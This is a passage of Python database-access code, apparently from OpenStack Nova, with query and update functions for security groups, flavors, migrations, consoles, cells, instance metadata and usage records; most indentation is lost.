models.SecurityGroupInstanceAssociation,
read_deleted="no", session=session).\
filter_by(security_group_id=group_id).\
all()
for ia in inst_assoc:
num_instances = model_query(context, models.Instance,
session=session, read_deleted="no").\
filter_by(uuid=ia.instance_uuid).\
count()
if num_instances:
return True
return False
@require_context
def security_group_create(context, values):
return _security_group_create(context, values)
@require_context
def security_group_update(context, security_group_id, values,
columns_to_join=None):
session = get_session()
with session.begin():
query = model_query(context, models.SecurityGroup,
session=session).filter_by(id=security_group_id)
if columns_to_join:
for column in columns_to_join:
query = query.options(joinedload_all(column))
security_group_ref = query.first()
if not security_group_ref:
raise exception.SecurityGroupNotFound(
security_group_id=security_group_id)
security_group_ref.update(values)
name = security_group_ref['name']
project_id = security_group_ref['project_id']
try:
security_group_ref.save(session=session)
except db_exc.DBDuplicateEntry:
raise exception.SecurityGroupExists(
project_id=project_id,
security_group_name=name)
return security_group_ref
def security_group_ensure_default(context):
"""Ensure default security group exists for a project_id."""
session = get_session()
with session.begin():
try:
default_group = _security_group_get_by_names(context,
session,
context.project_id,
['default'])[0]
except exception.NotFound:
values = {'name': 'default',
'description': 'default',
'user_id': context.user_id,
'project_id': context.project_id}
default_group = _security_group_create(context, values,
session=session)
usage = model_query(context, models.QuotaUsage,
read_deleted="no", session=session).\
filter_by(project_id=context.project_id).\
filter_by(user_id=context.user_id).\
filter_by(resource='security_groups')
# Create quota usage for auto created default security group
if not usage.first():
elevated = context.elevated()
_quota_usage_create(elevated,
context.project_id,
context.user_id,
'security_groups',
1, 0,
None,
session=session)
else:
usage.update({'in_use': int(usage.first().in_use) + 1})
default_rules = _security_group_rule_get_default_query(context,
session=session).all()
for default_rule in default_rules:
            # This is suboptimal; it should be possible to pick up the
            # default_rule values programmatically instead of copying them
            # field by field here.
rule_values = {'protocol': default_rule.protocol,
'from_port': default_rule.from_port,
'to_port': default_rule.to_port,
'cidr': default_rule.cidr,
'parent_group_id': default_group.id,
}
_security_group_rule_create(context,
rule_values,
session=session)
return default_group
@require_context
def security_group_destroy(context, security_group_id):
session = get_session()
with session.begin():
model_query(context, models.SecurityGroup,
session=session).\
filter_by(id=security_group_id).\
soft_delete()
model_query(context, models.SecurityGroupInstanceAssociation,
session=session).\
filter_by(security_group_id=security_group_id).\
soft_delete()
model_query(context, models.SecurityGroupIngressRule,
session=session).\
filter_by(group_id=security_group_id).\
soft_delete()
model_query(context, models.SecurityGroupIngressRule,
session=session).\
filter_by(parent_group_id=security_group_id).\
soft_delete()
def _security_group_count_by_project_and_user(context, project_id, user_id,
session=None):
nova.context.authorize_project_context(context, project_id)
return model_query(context, models.SecurityGroup, read_deleted="no",
session=session).\
filter_by(project_id=project_id).\
filter_by(user_id=user_id).\
count()
###################
def _security_group_rule_create(context, values, session=None):
security_group_rule_ref = models.SecurityGroupIngressRule()
security_group_rule_ref.update(values)
security_group_rule_ref.save(session=session)
return security_group_rule_ref
def _security_group_rule_get_query(context, session=None):
return model_query(context, models.SecurityGroupIngressRule,
session=session)
@require_context
def security_group_rule_get(context, security_group_rule_id):
result = (_security_group_rule_get_query(context).
filter_by(id=security_group_rule_id).
first())
if not result:
raise exception.SecurityGroupNotFoundForRule(
rule_id=security_group_rule_id)
return result
@require_context
def security_group_rule_get_by_security_group(context, security_group_id,
columns_to_join=None):
if columns_to_join is None:
columns_to_join = ['grantee_group.instances.system_metadata',
'grantee_group.instances.info_cache']
query = (_security_group_rule_get_query(context).
filter_by(parent_group_id=security_group_id))
for column in columns_to_join:
query = query.options(joinedload_all(column))
return query.all()
@require_context
def security_group_rule_get_by_security_group_grantee(context,
security_group_id):
return (_security_group_rule_get_query(context).
filter_by(group_id=security_group_id).
all())
@require_context
def security_group_rule_create(context, values):
return _security_group_rule_create(context, values)
@require_context
def security_group_rule_destroy(context, security_group_rule_id):
count = (_security_group_rule_get_query(context).
filter_by(id=security_group_rule_id).
soft_delete())
if count == 0:
raise exception.SecurityGroupNotFoundForRule(
rule_id=security_group_rule_id)
@require_context
def security_group_rule_count_by_group(context, security_group_id):
return (model_query(context, models.SecurityGroupIngressRule,
read_deleted="no").
filter_by(parent_group_id=security_group_id).
count())
###################
def _security_group_rule_get_default_query(context, session=None):
return model_query(context, models.SecurityGroupIngressDefaultRule,
session=session)
@require_context
def security_group_default_rule_get(context, security_group_rule_default_id):
result = _security_group_rule_get_default_query(context).\
filter_by(id=security_group_rule_default_id).\
first()
if not result:
raise exception.SecurityGroupDefaultRuleNotFound(
rule_id=security_group_rule_default_id)
return result
@require_admin_context
def security_group_default_rule_destroy(context,
security_group_rule_default_id):
session = get_session()
with session.begin():
count = _security_group_rule_get_default_query(context,
session=session).\
filter_by(id=security_group_rule_default_id).\
soft_delete()
if count == 0:
raise exception.SecurityGroupDefaultRuleNotFound(
rule_id=security_group_rule_default_id)
@require_admin_context
def security_group_default_rule_create(context, values):
security_group_default_rule_ref = models.SecurityGroupIngressDefaultRule()
security_group_default_rule_ref.update(values)
security_group_default_rule_ref.save()
return security_group_default_rule_ref
@require_context
def security_group_default_rule_list(context):
return _security_group_rule_get_default_query(context).\
all()
###################
@require_admin_context
def provider_fw_rule_create(context, rule):
fw_rule_ref = models.ProviderFirewallRule()
fw_rule_ref.update(rule)
fw_rule_ref.save()
return fw_rule_ref
@require_admin_context
def provider_fw_rule_get_all(context):
return model_query(context, models.ProviderFirewallRule).all()
@require_admin_context
def provider_fw_rule_destroy(context, rule_id):
session = get_session()
with session.begin():
session.query(models.ProviderFirewallRule).\
filter_by(id=rule_id).\
soft_delete()
###################
@require_context
def project_get_networks(context, project_id, associate=True):
# NOTE(tr3buchet): as before this function will associate
# a project with a network if it doesn't have one and
# associate is true
result = model_query(context, models.Network, read_deleted="no").\
filter_by(project_id=project_id).\
all()
if not result:
if not associate:
return []
return [network_associate(context, project_id)]
return result
###################
@require_admin_context
def migration_create(context, values):
migration = models.Migration()
migration.update(values)
migration.save()
return migration
@require_admin_context
def migration_update(context, id, values):
session = get_session()
with session.begin():
migration = _migration_get(context, id, session=session)
migration.update(values)
return migration
def _migration_get(context, id, session=None):
result = model_query(context, models.Migration, session=session,
read_deleted="yes").\
filter_by(id=id).\
first()
if not result:
raise exception.MigrationNotFound(migration_id=id)
return result
@require_admin_context
def migration_get(context, id):
return _migration_get(context, id)
@require_admin_context
def migration_get_by_instance_and_status(context, instance_uuid, status):
result = model_query(context, models.Migration, read_deleted="yes").\
filter_by(instance_uuid=instance_uuid).\
filter_by(status=status).\
first()
if not result:
raise exception.MigrationNotFoundByStatus(instance_id=instance_uuid,
status=status)
return result
@require_admin_context
def migration_get_unconfirmed_by_dest_compute(context, confirm_window,
dest_compute, use_slave=False):
confirm_window = (timeutils.utcnow() -
datetime.timedelta(seconds=confirm_window))
return model_query(context, models.Migration, read_deleted="yes",
use_slave=use_slave).\
filter(models.Migration.updated_at <= confirm_window).\
filter_by(status="finished").\
filter_by(dest_compute=dest_compute).\
all()
@require_admin_context
def migration_get_in_progress_by_host_and_node(context, host, node):
return model_query(context, models.Migration).\
filter(or_(and_(models.Migration.source_compute == host,
models.Migration.source_node == node),
and_(models.Migration.dest_compute == host,
models.Migration.dest_node == node))).\
filter(~models.Migration.status.in_(['confirmed', 'reverted',
'error'])).\
options(joinedload_all('instance.system_metadata')).\
all()
@require_admin_context
def migration_get_all_by_filters(context, filters):
query = model_query(context, models.Migration)
if "status" in filters:
query = query.filter(models.Migration.status == filters["status"])
if "host" in filters:
host = filters["host"]
query = query.filter(or_(models.Migration.source_compute == host,
models.Migration.dest_compute == host))
return query.all()
##################
def console_pool_create(context, values):
pool = models.ConsolePool()
pool.update(values)
try:
pool.save()
except db_exc.DBDuplicateEntry:
raise exception.ConsolePoolExists(
host=values["host"],
console_type=values["console_type"],
compute_host=values["compute_host"],
)
return pool
def console_pool_get_by_host_type(context, compute_host, host,
console_type):
result = model_query(context, models.ConsolePool, read_deleted="no").\
filter_by(host=host).\
filter_by(console_type=console_type).\
filter_by(compute_host=compute_host).\
options(joinedload('consoles')).\
first()
if not result:
raise exception.ConsolePoolNotFoundForHostType(
host=host, console_type=console_type,
compute_host=compute_host)
return result
def console_pool_get_all_by_host_type(context, host, console_type):
return model_query(context, models.ConsolePool, read_deleted="no").\
filter_by(host=host).\
filter_by(console_type=console_type).\
options(joinedload('consoles')).\
all()
def console_create(context, values):
console = models.Console()
console.update(values)
console.save()
return console
def console_delete(context, console_id):
session = get_session()
with session.begin():
# NOTE(mdragon): consoles are meant to be transient.
session.query(models.Console).\
filter_by(id=console_id).\
delete()
def console_get_by_pool_instance(context, pool_id, instance_uuid):
result = model_query(context, models.Console, read_deleted="yes").\
filter_by(pool_id=pool_id).\
filter_by(instance_uuid=instance_uuid).\
options(joinedload('pool')).\
first()
if not result:
raise exception.ConsoleNotFoundInPoolForInstance(
pool_id=pool_id, instance_uuid=instance_uuid)
return result
def console_get_all_by_instance(context, instance_uuid, columns_to_join=None):
query = model_query(context, models.Console, read_deleted="yes").\
filter_by(instance_uuid=instance_uuid)
if columns_to_join:
for column in columns_to_join:
query = query.options(joinedload(column))
return query.all()
def console_get(context, console_id, instance_uuid=None):
query = model_query(context, models.Console, read_deleted="yes").\
filter_by(id=console_id).\
options(joinedload('pool'))
if instance_uuid is not None:
query = query.filter_by(instance_uuid=instance_uuid)
result = query.first()
if not result:
if instance_uuid:
raise exception.ConsoleNotFoundForInstance(
console_id=console_id, instance_uuid=instance_uuid)
else:
raise exception.ConsoleNotFound(console_id=console_id)
return result
##################
@require_admin_context
def flavor_create(context, values, projects=None):
"""Create a new instance type. In order to pass in extra specs,
    the values dict should contain an 'extra_specs' key/value pair:
{'extra_specs' : {'k1': 'v1', 'k2': 'v2', ...}}
"""
specs = values.get('extra_specs')
specs_refs = []
if specs:
for k, v in specs.iteritems():
specs_ref = models.InstanceTypeExtraSpecs()
specs_ref['key'] = k
specs_ref['value'] = v
specs_refs.append(specs_ref)
values['extra_specs'] = specs_refs
instance_type_ref = models.InstanceTypes()
instance_type_ref.update(values)
if projects is None:
projects = []
session = get_session()
with session.begin():
try:
instance_type_ref.save()
except db_exc.DBDuplicateEntry as e:
if 'flavorid' in e.columns:
raise exception.FlavorIdExists(flavor_id=values['flavorid'])
raise exception.FlavorExists(name=values['name'])
except Exception as e:
raise db_exc.DBError(e)
for project in set(projects):
access_ref = models.InstanceTypeProjects()
access_ref.update({"instance_type_id": instance_type_ref.id,
"project_id": project})
access_ref.save()
return _dict_with_extra_specs(instance_type_ref)
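# Illustrative call with hypothetical values:
#
#     flavor_create(ctxt,
#                   {'name': 'm1.custom', 'flavorid': 'ft-1',
#                    'memory_mb': 512, 'vcpus': 1, 'root_gb': 1,
#                    'extra_specs': {'key1': 'value1'}},
#                   projects=['proj-1'])
#
# A duplicate name raises FlavorExists and a duplicate flavorid raises
# FlavorIdExists; each project in `projects` gets an InstanceTypeProjects
# access row.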
def _dict_with_extra_specs(inst_type_query):
"""Takes an instance or instance type query returned
by sqlalchemy and returns it as a dictionary, converting the
extra_specs entry from a list of dicts:
'extra_specs' : [{'key': 'k1', 'value': 'v1', ...}, ...]
to a single dict:
'extra_specs' : {'k1': 'v1'}
"""
inst_type_dict = dict(inst_type_query)
extra_specs = dict([(x['key'], x['value'])
for x in inst_type_query['extra_specs']])
inst_type_dict['extra_specs'] = extra_specs
return inst_type_dict
def _flavor_get_query(context, session=None, read_deleted=None):
query = model_query(context, models.InstanceTypes, session=session,
read_deleted=read_deleted).\
options(joinedload('extra_specs'))
if not context.is_admin:
the_filter = [models.InstanceTypes.is_public == True]
the_filter.extend([
models.InstanceTypes.projects.any(project_id=context.project_id)
])
query = query.filter(or_(*the_filter))
return query
@require_context
def flavor_get_all(context, inactive=False, filters=None,
sort_key='flavorid', sort_dir='asc', limit=None,
marker=None):
"""Returns all flavors.
"""
filters = filters or {}
# FIXME(sirp): now that we have the `disabled` field for flavors, we
# should probably remove the use of `deleted` to mark inactive. `deleted`
# should mean truly deleted, e.g. we can safely purge the record out of the
# database.
read_deleted = "yes" if inactive else "no"
sort_fn = {'desc': desc, 'asc': asc}
query = _flavor_get_query(context, read_deleted=read_deleted)
if 'min_memory_mb' in filters:
query = query.filter(
models.InstanceTypes.memory_mb >= filters['min_memory_mb'])
if 'min_root_gb' in filters:
query = query.filter(
models.InstanceTypes.root_gb >= filters['min_root_gb'])
if 'disabled' in filters:
query = query.filter(
models.InstanceTypes.disabled == filters['disabled'])
if 'is_public' in filters and filters['is_public'] is not None:
the_filter = [models.InstanceTypes.is_public == filters['is_public']]
if filters['is_public'] and context.project_id is not None:
the_filter.extend([
models.InstanceTypes.projects.any(
project_id=context.project_id, deleted=0)
])
if len(the_filter) > 1:
query = query.filter(or_(*the_filter))
else:
query = query.filter(the_filter[0])
marker_row = None
if marker is not None:
marker_row = _flavor_get_query(context, read_deleted=read_deleted).\
filter_by(flavorid=marker).\
first()
if not marker_row:
raise exception.MarkerNotFound(marker)
query = sqlalchemyutils.paginate_query(query, models.InstanceTypes, limit,
[sort_key, 'id'],
marker=marker_row,
sort_dir=sort_dir)
inst_types = query.all()
return [_dict_with_extra_specs(i) for i in inst_types]
def _flavor_get_id_from_flavor_query(context, flavor_id, session=None):
return model_query(context, models.InstanceTypes.id, read_deleted="no",
session=session, base_model=models.InstanceTypes).\
filter_by(flavorid=flavor_id)
def _flavor_get_id_from_flavor(context, flavor_id, session=None):
result = _flavor_get_id_from_flavor_query(context, flavor_id,
session=session).\
first()
if not result:
raise exception.FlavorNotFound(flavor_id=flavor_id)
return result[0]
@require_context
def flavor_get(context, id):
"""Returns a dict describing specific flavor."""
result = _flavor_get_query(context).\
filter_by(id=id).\
first()
if not result:
raise exception.FlavorNotFound(flavor_id=id)
return _dict_with_extra_specs(result)
@require_context
def flavor_get_by_name(context, name):
"""Returns a dict describing specific flavor."""
result = _flavor_get_query(context).\
filter_by(name=name).\
first()
if not result:
raise exception.FlavorNotFoundByName(flavor_name=name)
return _dict_with_extra_specs(result)
@require_context
def flavor_get_by_flavor_id(context, flavor_id, read_deleted):
"""Returns a dict describing specific flavor_id."""
result = _flavor_get_query(context, read_deleted=read_deleted).\
filter_by(flavorid=flavor_id).\
order_by(asc("deleted"), asc("id")).\
first()
if not result:
raise exception.FlavorNotFound(flavor_id=flavor_id)
return _dict_with_extra_specs(result)
@require_admin_context
def flavor_destroy(context, name):
"""Marks specific flavor as deleted."""
session = get_session()
with session.begin():
ref = model_query(context, models.InstanceTypes, session=session,
read_deleted="no").\
filter_by(name=name).\
first()
if not ref:
raise exception.FlavorNotFoundByName(flavor_name=name)
ref.soft_delete(session=session)
model_query(context, models.InstanceTypeExtraSpecs,
session=session, read_deleted="no").\
filter_by(instance_type_id=ref['id']).\
soft_delete()
model_query(context, models.InstanceTypeProjects,
session=session, read_deleted="no").\
filter_by(instance_type_id=ref['id']).\
soft_delete()
def _flavor_access_query(context, session=None):
return model_query(context, models.InstanceTypeProjects, session=session,
read_deleted="no")
@require_admin_context
def flavor_access_get_by_flavor_id(context, flavor_id):
"""Get flavor access list by flavor id."""
instance_type_id_subq = \
_flavor_get_id_from_flavor_query(context, flavor_id)
access_refs = _flavor_access_query(context).\
filter_by(instance_type_id=instance_type_id_subq).\
all()
return access_refs
@require_admin_context
def flavor_access_add(context, flavor_id, project_id):
"""Add given tenant to the flavor access list."""
instance_type_id = _flavor_get_id_from_flavor(context, flavor_id)
access_ref = models.InstanceTypeProjects()
access_ref.update({"instance_type_id": instance_type_id,
"project_id": project_id})
try:
access_ref.save()
except db_exc.DBDuplicateEntry:
raise exception.FlavorAccessExists(flavor_id=flavor_id,
project_id=project_id)
return access_ref
@require_admin_context
def flavor_access_remove(context, flavor_id, project_id):
"""Remove given tenant from the flavor access list."""
instance_type_id = _flavor_get_id_from_flavor(context, flavor_id)
count = _flavor_access_query(context).\
filter_by(instance_type_id=instance_type_id).\
filter_by(project_id=project_id).\
soft_delete(synchronize_session=False)
if count == 0:
raise exception.FlavorAccessNotFound(flavor_id=flavor_id,
project_id=project_id)
def _flavor_extra_specs_get_query(context, flavor_id, session=None):
instance_type_id_subq = \
_flavor_get_id_from_flavor_query(context, flavor_id)
return model_query(context, models.InstanceTypeExtraSpecs, session=session,
read_deleted="no").\
filter_by(instance_type_id=instance_type_id_subq)
@require_context
def flavor_extra_specs_get(context, flavor_id):
rows = _flavor_extra_specs_get_query(context, flavor_id).all()
return dict([(row['key'], row['value']) for row in rows])
@require_context
def flavor_extra_specs_get_item(context, flavor_id, key):
result = _flavor_extra_specs_get_query(context, flavor_id).\
filter(models.InstanceTypeExtraSpecs.key == key).\
first()
if not result:
raise exception.FlavorExtraSpecsNotFound(
extra_specs_key=key, flavor_id=flavor_id)
return {result["key"]: result["value"]}
@require_context
def flavor_extra_specs_delete(context, flavor_id, key):
result = _flavor_extra_specs_get_query(context, flavor_id).\
filter(models.InstanceTypeExtraSpecs.key == key).\
soft_delete(synchronize_session=False)
# did not find the extra spec
if result == 0:
raise exception.FlavorExtraSpecsNotFound(
extra_specs_key=key, flavor_id=flavor_id)
@require_context
def flavor_extra_specs_update_or_create(context, flavor_id, specs,
max_retries=10):
for attempt in xrange(max_retries):
try:
session = get_session()
with session.begin():
instance_type_id = _flavor_get_id_from_flavor(context,
flavor_id, session)
spec_refs = model_query(context, models.InstanceTypeExtraSpecs,
session=session, read_deleted="no").\
filter_by(instance_type_id=instance_type_id).\
filter(models.InstanceTypeExtraSpecs.key.in_(specs.keys())).\
all()
existing_keys = set()
for spec_ref in spec_refs:
key = spec_ref["key"]
existing_keys.add(key)
spec_ref.update({"value": specs[key]})
for key, value in specs.iteritems():
if key in existing_keys:
continue
spec_ref = models.InstanceTypeExtraSpecs()
spec_ref.update({"key": key, "value": value,
"instance_type_id": instance_type_id})
session.add(spec_ref)
return specs
except db_exc.DBDuplicateEntry:
# a concurrent transaction has been committed,
# try again unless this was the last attempt
if attempt == max_retries - 1:
raise
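# Usage sketch (illustrative only; `ctxt` and the spec values are made up).
# The retry loop above covers the race where a concurrent transaction inserts
# the same key between the SELECT and the INSERT; callers just pass the full
# set of specs they want stored:
#
#     flavor_extra_specs_update_or_create(ctxt, 'ssd-1',
#                                         {'hw:cpu_policy': 'dedicated',
#                                          'hw:numa_nodes': '2'})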
####################
@require_admin_context
def cell_create(context, values):
cell = models.Cell()
cell.update(values)
try:
cell.save()
except db_exc.DBDuplicateEntry:
raise exception.CellExists(name=values['name'])
return cell
def _cell_get_by_name_query(context, cell_name, session=None):
return model_query(context, models.Cell,
session=session).filter_by(name=cell_name)
@require_admin_context
def cell_update(context, cell_name, values):
session = get_session()
with session.begin():
cell_query = _cell_get_by_name_query(context, cell_name,
session=session)
if not cell_query.update(values):
raise exception.CellNotFound(cell_name=cell_name)
cell = cell_query.first()
return cell
@require_admin_context
def cell_delete(context, cell_name):
return _cell_get_by_name_query(context, cell_name).soft_delete()
@require_admin_context
def cell_get(context, cell_name):
result = _cell_get_by_name_query(context, cell_name).first()
if not result:
raise exception.CellNotFound(cell_name=cell_name)
return result
@require_admin_context
def cell_get_all(context):
return model_query(context, models.Cell, read_deleted="no").all()
########################
# User-provided metadata
def _instance_metadata_get_multi(context, instance_uuids,
session=None, use_slave=False):
if not instance_uuids:
return []
return model_query(context, models.InstanceMetadata,
session=session, use_slave=use_slave).\
filter(
models.InstanceMetadata.instance_uuid.in_(instance_uuids))
def _instance_metadata_get_query(context, instance_uuid, session=None):
return model_query(context, models.InstanceMetadata, session=session,
read_deleted="no").\
filter_by(instance_uuid=instance_uuid)
@require_context
def instance_metadata_get(context, instance_uuid):
rows = _instance_metadata_get_query(context, instance_uuid).all()
return dict((row['key'], row['value']) for row in rows)
@require_context
@_retry_on_deadlock
def instance_metadata_delete(context, instance_uuid, key):
_instance_metadata_get_query(context, instance_uuid).\
filter_by(key=key).\
soft_delete()
@require_context
@_retry_on_deadlock
def instance_metadata_update(context, instance_uuid, metadata, delete):
all_keys = metadata.keys()
session = get_session()
with session.begin(subtransactions=True):
if delete:
_instance_metadata_get_query(context, instance_uuid,
session=session).\
filter(~models.InstanceMetadata.key.in_(all_keys)).\
soft_delete(synchronize_session=False)
already_existing_keys = []
meta_refs = _instance_metadata_get_query(context, instance_uuid,
session=session).\
filter(models.InstanceMetadata.key.in_(all_keys)).\
all()
for meta_ref in meta_refs:
already_existing_keys.append(meta_ref.key)
meta_ref.update({"value": metadata[meta_ref.key]})
new_keys = set(all_keys) - set(already_existing_keys)
for key in new_keys:
meta_ref = models.InstanceMetadata()
meta_ref.update({"key": key, "value": metadata[key],
"instance_uuid": instance_uuid})
session.add(meta_ref)
return metadata
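# Usage sketch (illustrative only; `ctxt` and the metadata values are made
# up). With delete=True the call is authoritative: keys missing from the
# passed dict are soft-deleted, existing keys are updated in place, and new
# keys are inserted:
#
#     instance_metadata_update(ctxt, instance_uuid,
#                              {'role': 'web', 'tier': 'frontend'},
#                              delete=True)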
#######################
# System-owned metadata
def _instance_system_metadata_get_multi(context, instance_uuids,
session=None, use_slave=False):
if not instance_uuids:
return []
return model_query(context, models.InstanceSystemMetadata,
session=session, use_slave=use_slave).\
filter(
models.InstanceSystemMetadata.instance_uuid.in_(instance_uuids))
def _instance_system_metadata_get_query(context, instance_uuid, session=None):
return model_query(context, models.InstanceSystemMetadata,
session=session).\
filter_by(instance_uuid=instance_uuid)
@require_context
def instance_system_metadata_get(context, instance_uuid):
rows = _instance_system_metadata_get_query(context, instance_uuid).all()
return dict((row['key'], row['value']) for row in rows)
@require_context
def instance_system_metadata_update(context, instance_uuid, metadata, delete):
all_keys = metadata.keys()
session = get_session()
with session.begin(subtransactions=True):
if delete:
_instance_system_metadata_get_query(context, instance_uuid,
session=session).\
filter(~models.InstanceSystemMetadata.key.in_(all_keys)).\
soft_delete(synchronize_session=False)
already_existing_keys = []
meta_refs = _instance_system_metadata_get_query(context, instance_uuid,
session=session).\
filter(models.InstanceSystemMetadata.key.in_(all_keys)).\
all()
for meta_ref in meta_refs:
already_existing_keys.append(meta_ref.key)
meta_ref.update({"value": metadata[meta_ref.key]})
new_keys = set(all_keys) - set(already_existing_keys)
for key in new_keys:
meta_ref = models.InstanceSystemMetadata()
meta_ref.update({"key": key, "value": metadata[key],
"instance_uuid": instance_uuid})
session.add(meta_ref)
return metadata
####################
@require_admin_context
def agent_build_create(context, values):
agent_build_ref = models.AgentBuild()
agent_build_ref.update(values)
try:
agent_build_ref.save()
except db_exc.DBDuplicateEntry:
raise exception.AgentBuildExists(hypervisor=values['hypervisor'],
os=values['os'], architecture=values['architecture'])
return agent_build_ref
@require_admin_context
def agent_build_get_by_triple(context, hypervisor, os, architecture):
return model_query(context, models.AgentBuild, read_deleted="no").\
filter_by(hypervisor=hypervisor).\
filter_by(os=os).\
filter_by(architecture=architecture).\
first()
@require_admin_context
def agent_build_get_all(context, hypervisor=None):
if hypervisor:
return model_query(context, models.AgentBuild, read_deleted="no").\
filter_by(hypervisor=hypervisor).\
all()
else:
return model_query(context, models.AgentBuild, read_deleted="no").\
all()
@require_admin_context
def agent_build_destroy(context, agent_build_id):
rows_affected = model_query(context, models.AgentBuild).filter_by(
id=agent_build_id).soft_delete()
if rows_affected == 0:
raise exception.AgentBuildNotFound(id=agent_build_id)
@require_admin_context
def agent_build_update(context, agent_build_id, values):
rows_affected = model_query(context, models.AgentBuild).\
filter_by(id=agent_build_id).\
update(values)
if rows_affected == 0:
raise exception.AgentBuildNotFound(id=agent_build_id)
####################
@require_context
def bw_usage_get(context, uuid, start_period, mac, use_slave=False):
return model_query(context, models.BandwidthUsage, read_deleted="yes",
use_slave=use_slave).\
filter_by(start_period=start_period).\
filter_by(uuid=uuid).\
filter_by(mac=mac).\
first()
@require_context
def bw_usage_get_by_uuids(context, uuids, start_period):
return model_query(context, models.BandwidthUsage, read_deleted="yes").\
filter(models.BandwidthUsage.uuid.in_(uuids)).\
filter_by(start_period=start_period).\
all()
@require_context
@_retry_on_deadlock
def bw_usage_update(context, uuid, mac, start_period, bw_in, bw_out,
last_ctr_in, last_ctr_out, last_refreshed=None):
session = get_session()
if last_refreshed is None:
last_refreshed = timeutils.utcnow()
# NOTE(comstud): More often than not, we'll be updating records vs
# creating records. Optimize accordingly, trying to update existing
# records. Fall back to creation when no rows are updated.
with session.begin():
values = {'last_refreshed': last_refreshed,
'last_ctr_in': last_ctr_in,
'last_ctr_out': last_ctr_out,
'bw_in': bw_in,
'bw_out': bw_out}
rows = model_query(context, models.BandwidthUsage,
session=session, read_deleted="yes").\
filter_by(start_period=start_period).\
filter_by(uuid=uuid).\
filter_by(mac=mac).\
update(values, synchronize_session=False)
if rows:
return
bwusage = models.BandwidthUsage()
bwusage.start_period = start_period
bwusage.uuid = uuid
bwusage.mac = mac
bwusage.last_refreshed = last_refreshed
bwusage.bw_in = bw_in
bwusage.bw_out = bw_out
bwusage.last_ctr_in = last_ctr_in
bwusage.last_ctr_out = last_ctr_out
try:
bwusage.save(session=session)
except db_exc.DBDuplicateEntry:
# NOTE(sirp): Possible race if two greenthreads attempt to create
# the usage entry at the same time. First one wins.
pass
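# Usage sketch (illustrative only; the uuid, MAC and counters are made up).
# The function first tries an UPDATE of the (uuid, mac, start_period) row and
# only INSERTs when nothing was updated, so repeated calls for the same
# period keep a single usage record:
#
#     bw_usage_update(ctxt, instance_uuid, 'fa:16:3e:00:00:01', start_period,
#                     bw_in=1024, bw_out=2048,
#                     last_ctr_in=10, last_ctr_out=20)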
####################
@require_context
def vol_get_usage_by_time(context, begin):
"""Return volumes usage that have been updated after a specified time."""
return model_query(context, models.VolumeUsage, read_deleted="yes").\
filter(or_(models.VolumeUsage.tot_last_refreshed == None,
models.VolumeUsage.tot_last_refreshed > begin,
models.VolumeUsage.curr_last_refreshed == None,
models.VolumeUsage.curr_last_refreshed > begin,
)).\
all()
@require_context
def vol_usage_update(context, id, rd_req, rd_bytes, wr_req, wr_bytes,
instance_id, project_id, user_id, availability_zone,
update_totals=False):
session = get_session()
refreshed = timeutils.utcnow()
with session.begin():
values = {}
# NOTE(dricco): We will be mostly updating current usage records vs
# updating total or creating records. Optimize accordingly.
if not update_totals:
values = {'curr_last_refreshed': refreshed,
'curr_reads': rd_req,
'curr_read_bytes': rd_bytes,
'curr_writes': wr_req,
'curr_write_bytes': wr_bytes,
'instance_uuid': instance_id,
'project_id': project_id,
'user_id': user_id,
'availability_zone': availability_zone}
else:
values = {'tot_last_refreshed': refreshed,
'tot_reads': models.VolumeUsage.tot_reads + rd_req,
'tot_read_bytes': models.VolumeUsage.tot_read_bytes +
rd_bytes,
'tot_writes': models.VolumeUsage.tot_writes + wr_req,
'tot_write_bytes': models.VolumeUsage.tot_write_bytes +
wr_bytes,
'curr_reads': 0,
'curr_read_bytes': 0,
'curr_writes': 0,
'curr_write_bytes': 0,
'instance_uuid': instance_id,
'project_id': project_id,
'user_id': user_id,
'availability_zone': availability_zone}
current_usage = model_query(context, models.VolumeUsage,
session=session, read_deleted="yes").\
filter_by(volume_id=id).\
first()
if current_usage:
if (rd_req < current_usage['curr_reads'] or
rd_bytes < current_usage['curr_read_bytes'] or
wr_req < current_usage['curr_writes'] or
wr_bytes < current_usage['curr_write_bytes']):
LOG.info(_("Volume(%s) has lower stats then what is in "
"the database. Instance must have been rebooted "
"or crashed. Updating totals.") % id)
if not update_totals:
values['tot_reads'] = (models.VolumeUsage.tot_reads +
current_usage['curr_reads'])
values['tot_read_bytes'] = (
models.VolumeUsage.tot_read_bytes +
current_usage['curr_read_bytes'])
values['tot_writes'] = (models.VolumeUsage.tot_writes +
current_usage['curr_writes'])
values['tot_write_bytes'] = (
models.VolumeUsage.tot_write_bytes +
current_usage['curr_write_bytes'])
else:
values['tot_reads'] = (models.VolumeUsage.tot_reads +
current_usage['curr_reads'] +
rd_req)
values['tot_read_bytes'] = (
models.VolumeUsage.tot_read_bytes +
current_usage['curr_read_bytes'] + rd_bytes)
values['tot_writes'] = (models.VolumeUsage.tot_writes +
current_usage['curr_writes'] +
wr_req)
values['tot_write_bytes'] = (
models.VolumeUsage.tot_write_bytes +
current_usage['curr_write_bytes'] + wr_bytes)
current_usage.update(values)
current_usage.save(session=session)
session.refresh(current_usage)
return current_usage
vol_usage = models.VolumeUsage()
vol_usage.volume_id = id
vol_usage.instance_uuid = instance_id
vol_usage.project_id = project_id
vol_usage.user_id = user_id
vol_usage.availability_zone = availability_zone
if not update_totals:
vol_usage.curr_last_refreshed = refreshed
vol_usage.curr_reads = rd_req
vol_usage.curr_read_bytes = rd_bytes
vol_usage.curr_writes = wr_req
vol_usage.curr_write_bytes = wr_bytes
else:
vol_usage.tot_last_refreshed = refreshed
vol_usage.tot_reads = rd_req
vol_usage.tot_read_bytes = rd_bytes
vol_usage.tot_writes = wr_req
vol_usage.tot_write_bytes = wr_bytes
vol_usage.save(session=session)
return vol_usage
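# Usage sketch (illustrative only; all argument values are made up). A
# periodic poll updates the curr_* counters; passing update_totals=True
# folds them into the tot_* columns and resets the current ones:
#
#     vol_usage_update(ctxt, volume_id, rd_req=10, rd_bytes=4096,
#                      wr_req=5, wr_bytes=2048,
#                      instance_id=instance_uuid, project_id=project_id,
#                      user_id=user_id, availability_zone='nova')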
####################
def s3_image_get(context, image_id):
"""Find local s3 image represented by the provided id."""
result = model_query(context, models.S3Image, read_deleted="yes").\
filter_by(id=image_id).\
first()
if not result:
raise exception.ImageNotFound(image_id=image_id)
return result
def s3_image_get_by_uuid(context, image_uuid):
"""Find local s3 image represented by the provided uuid."""
result = model_query(context, models.S3Image, read_deleted="yes").\
filter_by(uuid=image_uuid).\
first()
if not result:
raise exception.ImageNotFound(image_id=image_uuid)
return result
def s3_image_create(context, image_uuid):
"""Create local s3 image represented by provided uuid."""
try:
s3_image_ref = models.S3Image()
